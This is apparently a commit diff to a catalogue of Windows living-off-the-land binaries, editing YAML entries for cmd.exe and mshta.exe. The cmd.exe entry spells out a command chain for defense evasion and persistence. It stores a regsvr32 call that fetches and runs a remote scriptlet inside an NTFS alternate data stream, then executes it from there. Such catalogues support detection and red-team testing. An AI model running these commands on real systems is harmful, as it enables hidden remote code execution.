Adjusted new contributions

yml/OSBinaries/Cmd.exe.yml

@@ -1,19 +1,24 @@
+---
 Name: Cmd.exe
 Description: The command-line interpreter in Windows
 Author: 'Ye Yint Min Thu Htut'
 Created: '2019-06-26'
 Commands:
   - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
-    Description: To add content in an Alternate Data Stream (ADS).
-    
-    Command: cmd.exe - < fakefile.doc:payload.bat
-    Description: Execute payload.bat which is stored in an Alternate Data Stream (ADS).
-    
+    Description: Add content to an Alternate Data Stream (ADS).
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T
-    MitreLink: https://attack.mitre.org/wiki/Technique/T
+    MitreID: T1170
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: cmd.exe - < fakefile.doc:payload.bat
+    Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
+    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
+    Category: ADS
+    Privileges: User
+    MitreID: T1170
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cmd.exe

yml/OSBinaries/Mshta.yml

@@ -35,7 +35,7 @@ Commands:
     Privileges: User
     MitreID: T1170
     MitreLink: https://attack.mitre.org/wiki/Technique/T1170
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
 Full_Path:
   - Path: C:\Windows\System32\mshta.exe
   - Path: C:\Windows\SysWOW64\mshta.exe